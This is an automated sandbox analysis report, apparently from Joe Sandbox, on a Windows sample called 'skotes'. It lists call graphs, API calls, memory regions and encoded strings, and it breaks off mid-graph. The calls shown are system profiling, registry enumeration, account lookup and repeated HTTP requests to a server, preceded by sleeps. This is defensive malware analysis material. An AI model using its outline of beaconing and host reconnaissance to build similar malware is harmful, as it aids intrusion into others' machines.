__Xtime_diff_to_millis2 11913->11912 11914 eacf6b _xtime_get GetSystemTimePreciseAsFileTime 11913->11914 11914->11913 11916 eacf7a 11915->11916 11917 eacf87 __aulldvrm 11915->11917 11916->11917 11919 eacf44 11916->11919 11917->11913 11922 eacbea 11919->11922 11923 eacbfb GetSystemTimePreciseAsFileTime 11922->11923 11925 eacc07 11922->11925 11923->11925 11925->11917 11929 e92ae0 11926->11929 11928 eac2ae std::_Xinvalid_argument 11928->11907 11935 eabedf 11929->11935 11931 e92aff 11931->11928 11933 e92af4 11933->11931 11938 ec8bec 11933->11938 11934 ec6cf6 11944 eacc31 11935->11944 11939 ec8bf1 11938->11939 11942 ec8bfc 11939->11942 11948 ecd634 11939->11948 11953 ec65ed 11942->11953 11943 ec8c2f __dosmaperr 11943->11934 11945 eacc3f InitOnceExecuteOnce 11944->11945 11947 eabef2 11944->11947 11945->11947 11947->11933 11949 ecd640 11948->11949 11950 ec65ed 2 API calls 11949->11950 11951 ecd69c __cftof __dosmaperr 11949->11951 11952 ecd82e __dosmaperr 11950->11952 11951->11942 11952->11942 11956 ec64c7 11953->11956 11959 ec64d5 11956->11959 11957 ec6520 11957->11943 11959->11957 11961 ec652b 11959->11961 11966 eca302 GetPEB 11961->11966 11963 ec6535 11964 ec653a GetPEB 11963->11964 11965 ec654a 11963->11965 11964->11965 11967 eca31c 11966->11967 11967->11963 11851 ea1ec0 11854 ea1f5b shared_ptr __dosmaperr 11851->11854 11852 e9e530 6 API calls 11853 ea2a26 shared_ptr std::_Xinvalid_argument 11852->11853 11854->11853 11855 ea1f68 11854->11855 11856 ea28c1 11854->11856 11855->11852 11860 e9e530 11856->11860 11858 ea2933 11858->11853 11875 e95ee0 11858->11875 11861 e9e576 shared_ptr 11860->11861 11863 e9e7fe shared_ptr 11861->11863 11882 e9be30 11861->11882 11864 e9ea18 shared_ptr 11863->11864 11865 e9e530 6 API calls 11863->11865 11864->11858 11867 e9f786 shared_ptr 11865->11867 11866 e9f982 shared_ptr 11866->11858 11867->11866 11868 e9e530 6 API calls 11867->11868 11869 e9fa63 shared_ptr __dosmaperr 11868->11869 11870 ea05ba 11869->11870 11872 e9fdd3 11869->11872 11874 e9fb35 shared_ptr std::_Xinvalid_argument 11869->11874 11871 e9e530 6 API calls 11870->11871 11871->11874 11873 e9e530 6 API calls 11872->11873 11873->11874 11874->11858 11877 e95f18 11875->11877 11876 e95ffe shared_ptr 11876->11853 11877->11876 11878 e96150 RegOpenKeyExA 11877->11878 11880 e96493 shared_ptr 11878->11880 11881 e961a3 __cftof 11878->11881 11879 e96243 RegEnumValueA 11879->11881 11880->11853 11881->11879 11881->11880 11883 e9be82 11882->11883 11885 e9c22e shared_ptr 11882->11885 11884 e9be96 Sleep InternetOpenW InternetConnectA 11883->11884 11883->11885 11886 e9bf18 11884->11886 11885->11863 11887 e9bf2e HttpOpenRequestA 11886->11887 11888 e9bf4c shared_ptr 11887->11888 11889 e9bfee HttpSendRequestA 11888->11889 11890 e9c006 shared_ptr 11889->11890 11891 e9c08e InternetReadFile 11890->11891 11892 e9c0b5 11891->11892 12002 ea6c70 12003 ea6ca0 12002->12003 12006 ea47b0 12003->12006 12005 ea6cec Sleep 12005->12003 12009 ea47eb 12006->12009 12020 ea4e73 shared_ptr std::_Xinvalid_argument 12006->12020 12007 ea4f59 shared_ptr 12007->12005 12010 e9be30 6 API calls 12009->12010 12009->12020 12021 ea4843 shared_ptr __dosmaperr 12010->12021 12011 ea5015 shared_ptr 12012 ea50de shared_ptr 12011->12012 12016 ea6c46 12011->12016 12056 e97d30 12012->12056 12014 ea50ed 12060 e98380 12014->12060 12017 ea47b0 16 API calls 12016->12017 12018 ea6cec Sleep 12017->12018 12018->12016 12019 e9be30 6 API calls 12022 ea4b62 shared_ptr 12019->12022 12020->12007 12052 e965e0 12020->12052 12021->12019 12021->12020 12022->12020 12023 ea4e5c 12022->12023 12027 ea4390 12023->12027 12025 ea4e70 12025->12020 12026 ea5106 shared_ptr 12026->12005 12028 ea43d2 12027->12028 12030 ea4646 12028->12030 12040 ea43f8 shared_ptr 12028->12040 12029 ea477e shared_ptr 12029->12025 12031 ea3640 12 API calls 12030->12031 12034 ea4610 shared_ptr 12031->12034 12032 ea4f59 shared_ptr 12032->12025 12033 e965e0 LookupAccountNameA 12036 ea5015 shared_ptr 12033->12036 12034->12029 12035 e9be30 6 API calls 12034->12035 12047 ea4e70 shared_ptr std::_Xinvalid_argument 12034->12047 12048 ea4843 shared_ptr __dosmaperr 12035->12048 12037 ea50de shared_ptr 12036->12037 12043 ea6c46 12036->12043 12038 e97d30 GetNativeSystemInfo 12037->12038 12039 ea50ed 12038->12039 12042 e98380 GetNativeSystemInfo 12039->12042 12040->12034 12064 ea3640 12040->12064 12051 ea5106 shared_ptr 12042->12051 12044 ea47b0 16 API calls 12043->12044 12045 ea6cec Sleep 12044->12045 12045->12043 12046 e9be30 6 API calls 12049 ea4b62 shared_ptr 12046->12049 12047->12032 12047->12033 12048->12046 12048->12047 12049->12047 12050 ea4390 16 API calls 12049->12050 12050->12047 12051->12025 12092 4ad0740 12052->12092 12054 e96692 shared_ptr 12054->12011 12058 e97d96 shared_ptr __cftof 12056->12058 12057 e97ed3 GetNativeSystemInfo 12059 e97ed7 shared_ptr 12057->12059 12058->12057 12058->12059 12059->12014 12061 e983e5 shared_ptr __cftof 12060->12061 12062 e98524 GetNativeSystemInfo 12061->12062 12063 e98403 12061->12063 12062->12063 12063->12026 12065 ea367f shared_ptr __dosmaperr 12064->12065 12068 ea3ba2 shared_ptr std::_Xinvalid_argument 12064->12068 12066 ea3f42 12065->12066 12065->12068 12069 ea3c8d 12065->12069 12080 ea2f10 12066->12080 12068->12040 12071 ea1ec0 12069->12071 12074 ea1f5b shared_ptr __dosmaperr 12071->12074 12072 e9e530 6 API calls 12073 ea2a26 shared_ptr std::_Xinvalid_argument 12072->12073 12073->12068 12074->12073 12075 ea1f68 12074->12075 12076 ea28c1 12074->12076 12075->12072 12077 e9e530 6 API calls 12076->12077 12078 ea2933 12077->12078 12078->12073 12079 e95ee0 2 API calls 12078->12079 12079->12073 12082 ea2fb5 shared_ptr __cftof 12080->12082 12085 ea2f54 12080->12085 12081 e9e530 6 API calls 12086 ea3513 shared_ptr __dosmaperr 12081->12086 12083 ea33ce InternetCloseHandle InternetCloseHandle 12082->12083 12084 ea33e2 InternetCloseHandle InternetCloseHandle 12082->12084 12082->12085 12082->12086 12083->12082 12084->12082 12085->12081 12087 ea3f42 12086->12087 12089 ea360a shared_ptr std::_Xinvalid_argument 12086->12089 12090 ea3c8d 12086->12090 12088 ea2f10 8 API calls 12087->12088 12088->12089 12089->12068 12091 ea1ec0 8 API calls 12090->12091 12091->12089 12093 e9663f LookupAccountNameA 12092->12093 12093->12054 12097 eaa210 12098 eaa290 12097->12098 12104 ea71d0 12098->12104 12100 eaa2cc shared_ptr 12101 eaa4be shared_ptr 12100->12101 12108 e93ee0 12100->12108 12103 eaa4a6 12106 ea7211 __cftof 12104->12106 12105 ea7446 12105->12100 12106->12105 12114 e92ec0 12106->12114 12109 e93f48 12108->12109 12110 e93f1e 12108->12110 12111 e93f58 12109->12111 12157 e92c00 12109->12157 12110->12103 12111->12103 12115 e92f06 12114->12115 12118 e92f6f 12114->12118 12116 eac6ac GetSystemTimePreciseAsFileTime 12115->12116 12117 e92f12 12116->12117 12120 e9301e 12117->12120 12123 e92f1d __Mtx_unlock 12117->12123 12119 e92fef 12118->12119 12125 eac6ac GetSystemTimePreciseAsFileTime 12118->12125 12119->12105 12121 eac26a 3 API calls 12120->12121 12122 e93024 12121->12122 12124 eac26a 3 API calls 12122->12124 12123->12118 12123->12122 12126 e92fb9 12124->12126 12125->12126 12127 eac26a 3 API calls 12126->12127 12128 e92fc0 __Mtx_unlock 12126->12128 12127->12128 12129 eac26a 3 API calls 12128->12129 12130 e92fd8 __Cnd_broadcast 12128->12130 12129->12130 12130->12119 12131 eac26a 3 API calls 12130->12131 12132 e9303c 12131->12132 12133 eac6ac GetSystemTimePreciseAsFileTime 12132->12133 12140 e93080 shared_ptr __Mtx_unlock 12133->12140 12134 e931c5 12135 eac26a 3 API calls 12134->12135 12136 e931cb 12135->12136 12137 eac26a 3 API calls 12136->12137 12138 e931d1 12137->12138 12139 eac26a 3 API calls 12138->12139 12141 e93193 __Mtx_unlock 12139->12141 12140->12134 12140->12136 12142 e931a7 12140->12142 12145 eac6ac GetSystemTimePreciseAsFileTime 12140->12145 12141->12142 12143 eac26a 3 API calls 12141->12143 12142->12105 12144 e931dd 12143->12144 12146 e9315f 12145->12146 12146->12134 12146->12138 12146->12141 12148 eabd4c 12146->12148 12151 eabb72 12148->12151 12150 eabd5c 12150->12146 12152 eabb9c 12151->12152 12153 eacf6b _xtime_get GetSystemTimePreciseAsFileTime 12152->12153 12156 eabba4 __Xtime_diff_to_millis2 12152->12156 12154 eabbcf __Xtime_diff_to_millis2 12153->12154 12155 eacf6b _xtime_get GetSystemTimePreciseAsFileTime 12154->12155 12154->12156 12155->12156 12156->12150 12158 e92c0e 12157->12158 12164 eab847 12158->12164 12160 e92c42 12161 e92c49 12160->12161 12170 e92c80 12160->12170 12161->12103 12163 e92c58 std::_Xinvalid_argument 12165 eab854 12164->12165 12169 eab873 Concurrency::details::_Reschedule_chore 12164->12169 12173 eacb77 12165->12173 12167 eab864 12167->12169 12175 eab81e 12167->12175 12169->12160 12181 eab7fb 12170->12181 12172 e92cb2 shared_ptr 12172->12163 12174 eacb92 CreateThreadpoolWork 12173->12174 12174->12167 12177 eab827 Concurrency::details::_Reschedule_chore 12175->12177 12179 eacdcc 12177->12179 12178 eab841 12178->12169 12180 eacde1 TpPostWork 12179->12180 12180->12178 12182 eab817 12181->12182 12183 eab807 12181->12183 12182->12172 12183->12182 12185 eaca78 12183->12185 12186 eaca8d TpReleaseWork 12185->12186 12186->12182 12187 ea93e0 12188 ea9433 12187->12188 12189 ea93f5 12187->12189 12193 ead111 12189->12193 12191 ea93ff 12191->12188 12197 ead0c7 12191->12197 12195 ead121 12193->12195 12194 ead12a 12194->12191 12195->12194 12201 ead199 12195->12201 12198 ead0d7 12197->12198 12199 ead17f 12198->12199 12200 ead17b RtlWakeAllConditionVariable 12198->12200 12199->12188 12200->12188 12202 ead1a7 SleepConditionVariableCS 12201->12202 12204 ead1c0 12201->12204 12202->12204 12204->12195 12205 ea87d0 12206 ea882a __cftof 12205->12206 12212 ea9bb0 12206->12212 12208 ea8854 12211 ea886c 12208->12211 12216 e943f0 12208->12216 12210 ea88d9 std::_Throw_future_error 12213 ea9be5 12212->12213 12222 e92ce0 12213->12222 12215 ea9c16 12215->12208 12217 eabedf InitOnceExecuteOnce 12216->12217 12218 e9440a 12217->12218 12219 e94411 12218->12219 12220 ec6cbb 2 API calls 12218->12220 12219->12210 12221 e94424 12220->12221 12223 e92d1d 12222->12223 12224 eabedf InitOnceExecuteOnce 12223->12224 12225 e92d46 12224->12225 12226 e92d51 12225->12226 12227 e92d88 12225->12227 12231 eabef7 12225->12231 12226->12215 12238 e92440 12227->12238 12232 eabf03 std::_Xinvalid_argument 12231->12232 12233 eabf6a 12232->12233 12234 eabf73 12232->12234 12241 eabe7f 12233->12241 12236 e92ae0 3 API calls 12234->12236 12237 eabf6f 12236->12237 12237->12227 12251 eab5d6 12238->12251 12240 e92472 12242 eacc31 InitOnceExecuteOnce 12241->12242 12243 eabe97 12242->12243 12244 eabe9e 12243->12244 12247 ec6cbb 12243->12247 12244->12237 12249 ec6cc7 12247->12249 12248 ec8bec 2 API calls 12250 ec6cf6 12248->12250 12249->12248 12252 eab5f1 std::_Xinvalid_argument 12251->12252 12253 ec8bec 2 API calls 12252->12253 12254 eab658 12252->12254 12255 eab69f 12253->12255 12254->12240

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1644 e9be30-e9be7c 1645 e9c281-e9c2a6 call ea80c0 1644->1645 1646 e9be82-e9be86 1644->1646 1651 e9c2a8-e9c2b4 1645->1651 1652 e9c2d4-e9c2ec 1645->1652 1646->1645 1648 e9be8c-e9be90 1646->1648 1648->1645 1650 e9be96-e9bf2a Sleep InternetOpenW InternetConnectA call ea7a00 call e95c10 1648->1650 1675 e9bf2c 1650->1675 1676 e9bf2e-e9bf4a HttpOpenRequestA 1650->1676 1654 e9c2ca-e9c2d1 call ead663 1651->1654 1655 e9c2b6-e9c2c4 1651->1655 1656 e9c238-e9c250 1652->1656 1657 e9c2f2-e9c2fe 1652->1657 1654->1652 1655->1654 1659 e9c34f-e9c354 call ec6c6a 1655->1659 1663 e9c323-e9c33f call eacff1 1656->1663 1664 e9c256-e9c262 1656->1664 1661 e9c22e-e9c235 call ead663 1657->1661 1662 e9c304-e9c312 1657->1662 1661->1656 1662->1659 1671 e9c314 1662->1671 1672 e9c319-e9c320 call ead663 1664->1672 1673 e9c268-e9c276 1664->1673 1671->1661 1672->1663 1673->1659 1674 e9c27c 1673->1674 1674->1672 1675->1676 1681 e9bf7b-e9bfea call ea7a00 call e95c10 call ea7a00 call e95c10 1676->1681 1682 e9bf4c-e9bf5b 1676->1682 1696 e9bfec 1681->1696 1697 e9bfee-e9c004 HttpSendRequestA 1681->1697 1684 e9bf5d-e9bf6b 1682->1684 1685 e9bf71-e9bf78 call ead663 1682->1685 1684->1685 1685->1681 1696->1697 1698 e9c035-e9c05d 1697->1698 1699 e9c006-e9c015 1697->1699 1702 e9c05f-e9c06e 1698->1702 1703 e9c08e-e9c0af InternetReadFile 1698->1703 1700 e9c02b-e9c032 call ead663 1699->1700 1701 e9c017-e9c025 1699->1701 1700->1698 1701->1700 1705 e9c070-e9c07e 1702->1705 1706 e9c084-e9c08b call ead663 1702->1706 1707 e9c0b5 1703->1707 1705->1706 1706->1703 1708 e9c0c0-e9c170 call ec4250 1707->1708
                                  APIs
                                  • Sleep.KERNELBASE(000005DC), ref: 00E9BEB8
                                  • InternetOpenW.WININET(00EE8DC8,00000000,00000000,00000000,00000000), ref: 00E9BEC8
                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BEEC
                                  • HttpOpenRequestA.WININET(?,00000000), ref: 00E9BF36
                                  • HttpSendRequestA.WININET(?,00000000), ref: 00E9BFF6
                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 00E9C0A8
                                  • InternetCloseHandle.WININET(?), ref: 00E9C187
                                  • InternetCloseHandle.WININET(?), ref: 00E9C18F
                                  • InternetCloseHandle.WININET(?), ref: 00E9C197
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                  • String ID: 0a$8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$Xa$invalid stoi argument$stoi argument out of range
                                  • API String ID: 2167506142-761132540
                                  • Opcode ID: 9431baeddcd3540dc5b2eaf99b7befd011b36376ba058f468195e6c13d8f6f83
                                  • Instruction ID: 0c9fe448bc7849bee571dae8383171160df1a82259f9c0b547113630746e5542
                                  • Opcode Fuzzy Hash: 9431baeddcd3540dc5b2eaf99b7befd011b36376ba058f468195e6c13d8f6f83
                                  • Instruction Fuzzy Hash: 94B1F4B1A002189BDF28DF28CC84BEEBBB5EF45304F505199F509A72D1DB719AC4CB95

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2039 e965e0-e966b8 call 4ad0740 LookupAccountNameA call ea7a00 call e95c10 2046 e966ba 2039->2046 2047 e966bc-e966db call e922c0 2039->2047 2046->2047 2050 e966dd-e966ec 2047->2050 2051 e9670c-e96712 2047->2051 2053 e966ee-e966fc 2050->2053 2054 e96702-e96709 call ead663 2050->2054 2052 e96715-e9671a 2051->2052 2052->2052 2055 e9671c-e96744 call ea7a00 call e95c10 2052->2055 2053->2054 2056 e96937 call ec6c6a 2053->2056 2054->2051 2067 e96748-e96769 call e922c0 2055->2067 2068 e96746 2055->2068 2062 e9693c call ec6c6a 2056->2062 2066 e96941-e96946 call ec6c6a 2062->2066 2073 e9676b-e9677a 2067->2073 2074 e9679a-e967ae 2067->2074 2068->2067 2075 e9677c-e9678a 2073->2075 2076 e96790-e96797 call ead663 2073->2076 2080 e96858-e9687c 2074->2080 2081 e967b4-e967ba 2074->2081 2075->2062 2075->2076 2076->2074 2083 e96880-e96885 2080->2083 2082 e967c0-e967ed call ea7a00 call e95c10 2081->2082 2097 e967ef 2082->2097 2098 e967f1-e96818 call e922c0 2082->2098 2083->2083 2084 e96887-e968ec call ea80c0 * 2 2083->2084 2094 e96919-e96936 call eacff1 2084->2094 2095 e968ee-e968fd 2084->2095 2099 e9690f-e96916 call ead663 2095->2099 2100 e968ff-e9690d 2095->2100 2097->2098 2106 e96849-e9684c 2098->2106 2107 e9681a-e96829 2098->2107 2099->2094 2100->2066 2100->2099 2106->2082 2110 e96852 2106->2110 2108 e9682b-e96839 2107->2108 2109 e9683f-e96846 call ead663 2107->2109 2108->2056 2108->2109 2109->2106 2110->2080
                                  APIs
                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E96680
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AccountLookupName
                                  • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                  • API String ID: 1484870144-2309319047
                                  • Opcode ID: e1f45e3c587b95e239b96afae33116739a41bf30302c7b5fb5e710b5284c179a
                                  • Instruction ID: ef81d5b9d8aeb3b2a8655731b57d6bbf706259122ec79db2eb734c75b84193da
                                  • Opcode Fuzzy Hash: e1f45e3c587b95e239b96afae33116739a41bf30302c7b5fb5e710b5284c179a
                                  • Instruction Fuzzy Hash: E491D3B19001189BDF28DB28CC85BEDB7B9EB45304F4055EEE519A7282DB319BC4CFA4
                                  APIs
                                    • Part of subcall function 00EA7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA7AEC
                                    • Part of subcall function 00EA7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7AF8
                                    • Part of subcall function 00EA7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7B01
                                    • Part of subcall function 00E9BE30: Sleep.KERNELBASE(000005DC), ref: 00E9BEB8
                                    • Part of subcall function 00E9BE30: InternetOpenW.WININET(00EE8DC8,00000000,00000000,00000000,00000000), ref: 00E9BEC8
                                    • Part of subcall function 00E9BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BEEC
                                    • Part of subcall function 00E9BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00E9BF36
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00EA4F92
                                  • Sleep.KERNELBASE ref: 00EA6CF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InternetOpenSleep$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                                  • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$invalid stoi argument$stoi argument out of range
                                  • API String ID: 3927735766-4005516279
                                  • Opcode ID: 8c57455988c6055b738784879978c7b70a98dc553721b3effc0b8a3063ecd92e
                                  • Instruction ID: 346b5585f618436689d31cad824162e35307c707fdd7ce62116f5602813ae456
                                  • Opcode Fuzzy Hash: 8c57455988c6055b738784879978c7b70a98dc553721b3effc0b8a3063ecd92e
                                  • Instruction Fuzzy Hash: DC233771A001488BEB19DB28CD8979DBBB6DF8B304F5491D8E049BB2C2DB756B84CF51
                                  APIs
                                    • Part of subcall function 00EA7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA7AEC
                                    • Part of subcall function 00EA7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7AF8
                                    • Part of subcall function 00EA7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7B01
                                    • Part of subcall function 00E9BE30: Sleep.KERNELBASE(000005DC), ref: 00E9BEB8
                                    • Part of subcall function 00E9BE30: InternetOpenW.WININET(00EE8DC8,00000000,00000000,00000000,00000000), ref: 00E9BEC8
                                    • Part of subcall function 00E9BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BEEC
                                    • Part of subcall function 00E9BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00E9BF36
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00EA4F92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                  • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range$a$a
                                  • API String ID: 4201286991-1933972915
                                  • Opcode ID: c1e9eb7ea3516045da1162a6d54d800b40dedae2b91c6da898b0966332b745be
                                  • Instruction ID: 872b6786c1670bb4e9fc1f4f29d3b21b98b712c5cb9e9a49b7d720437c77cce8
                                  • Opcode Fuzzy Hash: c1e9eb7ea3516045da1162a6d54d800b40dedae2b91c6da898b0966332b745be
                                  • Instruction Fuzzy Hash: 05232571A002588BDB19DB28CD8979DBBB6DB8B304F5491D8E049BB2C2DB356F84CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1799 e97d30-e97db2 call ec40f0 1803 e97db8-e97de0 call ea7a00 call e95c10 1799->1803 1804 e98356-e98373 call eacff1 1799->1804 1811 e97de2 1803->1811 1812 e97de4-e97e06 call ea7a00 call e95c10 1803->1812 1811->1812 1817 e97e08 1812->1817 1818 e97e0a-e97e23 1812->1818 1817->1818 1821 e97e25-e97e34 1818->1821 1822 e97e54-e97e7f 1818->1822 1823 e97e4a-e97e51 call ead663 1821->1823 1824 e97e36-e97e44 1821->1824 1825 e97e81-e97e90 1822->1825 1826 e97eb0-e97ed1 1822->1826 1823->1822 1824->1823 1827 e98374 call ec6c6a 1824->1827 1829 e97e92-e97ea0 1825->1829 1830 e97ea6-e97ead call ead663 1825->1830 1831 e97ed3-e97ed5 GetNativeSystemInfo 1826->1831 1832 e97ed7-e97edc 1826->1832 1839 e98379-e9837f call ec6c6a 1827->1839 1829->1827 1829->1830 1830->1826 1836 e97edd-e97ee6 1831->1836 1832->1836 1837 e97ee8-e97eef 1836->1837 1838 e97f04-e97f07 1836->1838 1842 e98351 1837->1842 1843 e97ef5-e97eff 1837->1843 1844 e97f0d-e97f16 1838->1844 1845 e982f7-e982fa 1838->1845 1842->1804 1847 e9834c 1843->1847 1848 e97f29-e97f2c 1844->1848 1849 e97f18-e97f24 1844->1849 1845->1842 1850 e982fc-e98305 1845->1850 1847->1842 1852 e97f32-e97f39 1848->1852 1853 e982d4-e982d6 1848->1853 1849->1847 1854 e9832c-e9832f 1850->1854 1855 e98307-e9830b 1850->1855 1858 e98019-e982bd call ea7a00 call e95c10 call ea7a00 call e95c10 call e95d50 call ea7a00 call e95c10 call e95730 call ea7a00 call e95c10 call ea7a00 call e95c10 call e95d50 call ea7a00 call e95c10 call e95730 call ea7a00 call e95c10 call ea7a00 call e95c10 call e95d50 call ea7a00 call e95c10 call e95730 call ea7a00 call e95c10 call 